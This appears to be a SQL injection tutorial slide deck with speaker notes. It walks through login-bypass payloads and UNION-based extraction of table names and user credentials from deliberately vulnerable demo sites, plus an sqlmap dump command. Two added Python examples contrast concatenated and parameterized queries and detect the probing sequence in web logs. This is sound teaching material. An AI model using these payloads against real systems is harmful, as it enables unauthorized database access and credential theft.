What is SQL Injection?
- SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution.
- This vulnerability allows a hacker to submit crafted input to interfere with the application's interaction with back-end databases. A hacker may be able to obtain arbitrary data from the application, interfere with its logic, or execute commands on the database server itself.
Types of SQL Injection
Union-Based SQL Injection
- It is the most popular type of SQL injection. This type of attack uses the UNION statement, which combines the results of two SELECT statements, to obtain data from the database.
Error-Based SQL Injection
- An error-based SQL injection is the simplest type; the only difficulty with this method is that it runs only with MS-SQL Server. In this attack, we cause the application to show a database error in order to extract data. Normally, you ask the database a question, and it responds with an error that includes the data you asked for.
Blind SQL Injection
- The blind SQL injection is the hardest type. In this attack, no error messages are received from the database; hence, we extract the data by asking the database questions. Blind SQL injection is further divided into two kinds:
1. Boolean-based SQL injection
2. Time-based SQL injection
Authentication Bypass via SQLi
- The trick is to make the logical condition TRUE.
- SQL injection based on 1=1 is always true.
- SQL injection based on ""="" is always true.
- SQLi payloads:
  a' or 1=1--
  a" or 1=1--
  or a = a
  a' or 'a' = 'a
  1 or 1=1
  'or'='
Demo Website and VMs :
https://demo.testfire.net
http://testphp.vulnweb.com
OWASP Mutillidae II
Union Based SQL Injection
http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,@@version,8,9,10,database()
Enumerating Data:
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(uname,pass),8,9,10,11 from users
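The login bypass above and the UNION extraction in this section both come down to user input being pasted into the SQL text. The following is an added example (not code from the slide deck or from the demo sites): it rebuilds both situations against a constructed in-memory SQLite database, with each vulnerable query beside its parameterized and validated replacement. SQLite is assumed in place of the demo site's MySQL, so `uname||':'||pass` stands in for `group_concat(uname,pass)`; the login payload is the `'or''='` from the speaker notes.

```python
import sqlite3

# Constructed in-memory stand-in for a shop database; the tables and rows are
# invented for this example and are not the demo site's real schema or data.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products(id INTEGER, cat INTEGER, name TEXT);
CREATE TABLE users(uname TEXT, pass TEXT);
INSERT INTO products VALUES (1, 1, 'poster'), (2, 2, 'lamp');
INSERT INTO users VALUES ('test', 'test'), ('admin', 'hunter2');
""")

def login_vulnerable(user, pw):
    # String concatenation: quotes inside the input become part of the SQL text,
    # so 'or''=' turns the WHERE clause into "... OR ''=''", which is always true.
    sql = "SELECT uname FROM users WHERE uname='" + user + "' AND pass='" + pw + "'"
    return conn.execute(sql).fetchone() is not None

def login_safe(user, pw):
    # Bound parameters: the driver passes the values separately from the SQL text,
    # so the same input is compared literally against the stored columns.
    sql = "SELECT uname FROM users WHERE uname=? AND pass=?"
    return conn.execute(sql, (user, pw)).fetchone() is not None

def list_products_vulnerable(cat):
    # cat is interpolated raw, so "-1 union select ..." appends a second SELECT
    # whose rows (here, user credentials) are rendered in the product listing.
    sql = "SELECT id, cat, name FROM products WHERE cat=" + cat
    return conn.execute(sql).fetchall()

def is_valid_cat(cat):
    # Allow-list check: a category id must be an integer and nothing else.
    return cat.lstrip("-").isdigit()

def list_products_safe(cat):
    # Validate the type first, then bind the value: with both in place there is
    # no way for the input to change the shape of the query.
    if not is_valid_cat(cat):
        raise ValueError("cat must be an integer")
    sql = "SELECT id, cat, name FROM products WHERE cat=?"
    return conn.execute(sql, (int(cat),)).fetchall()
```

Run the vulnerable and safe functions with the same inputs to see that the payloads only work where the query text is built by concatenation.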
Playing with SQLMAP
- SQLmap is an open source tool written to exploit SQL injection vulnerabilities.
Sql injection attack

Editor's Notes

  • #6 Navigate to the test website: https://demo.testfire.net/login.jsp
    Set User & Password to: 'or''='
  • #9 Testing flow step by step:
    http://testphp.vulnweb.com/listproducts.php?cat=1
    http://testphp.vulnweb.com/listproducts.php?cat=1'  # Inject a quote and see the SQL error
    http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1  # Start searching for the column count
    http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12  # Observe the SQL error
    http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,11  # Use union select to find the vulnerable column
    http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,@@version,8,9,10,database()  # Execute SQL queries using SQL functions
  • #10 Enumerating Tables:
    http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11 from information_schema.tables where table_schema=database()
    Enumerating Columns:
    http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 from information_schema.columns where table_schema=database() and table_name='users'
  • #12 SQLmap Command:
    python sqlmap.py --url="http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C email,uname,pass --dump
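The step-by-step flow in notes #9 and #10 leaves a recognisable trail in web server logs: a quote probe, an ORDER BY walk, a UNION SELECT and then information_schema queries from the same client. The following is an added example (not part of the deck) that classifies each request by that stage and flags clients who progress through more than one; the log lines are constructed for the example in common log format, mirroring the URLs from the notes.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines reproducing the probing sequence from the
# speaker notes; these are not real server logs.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /listproducts.php?cat=1%27 HTTP/1.1" 200 731
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /listproducts.php?cat=1%20order%20by%2012 HTTP/1.1" 200 702
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11 HTTP/1.1" 200 4410
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,group_concat(table_name),8,9,10,11%20from%20information_schema.tables HTTP/1.1" 200 4610
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 5003
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# One pattern per stage of the walk-through, evaluated on the URL-decoded request.
STAGES = {
    "quote_probe": re.compile(r"=\d+'(?:\s|$)"),
    "order_by": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
}

def classify(url):
    """Return the set of stage names whose pattern matches the decoded URL."""
    decoded = unquote_plus(url)
    return {name for name, rx in STAGES.items() if rx.search(decoded)}

def stages_per_client(log_text):
    """Map client IP -> set of stages observed; lines that do not parse are skipped."""
    seen = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url, _status = m.groups()
        seen.setdefault(ip, set()).update(classify(url))
    return seen

def alerts(log_text, min_stages=2):
    """Clients that moved through at least min_stages distinct stages (sorted)."""
    return sorted(ip for ip, st in stages_per_client(log_text).items() if len(st) >= min_stages)
```

Requiring more than one stage per client keeps a single stray quote in a search term from raising an alert, while the full progression in the sample is flagged.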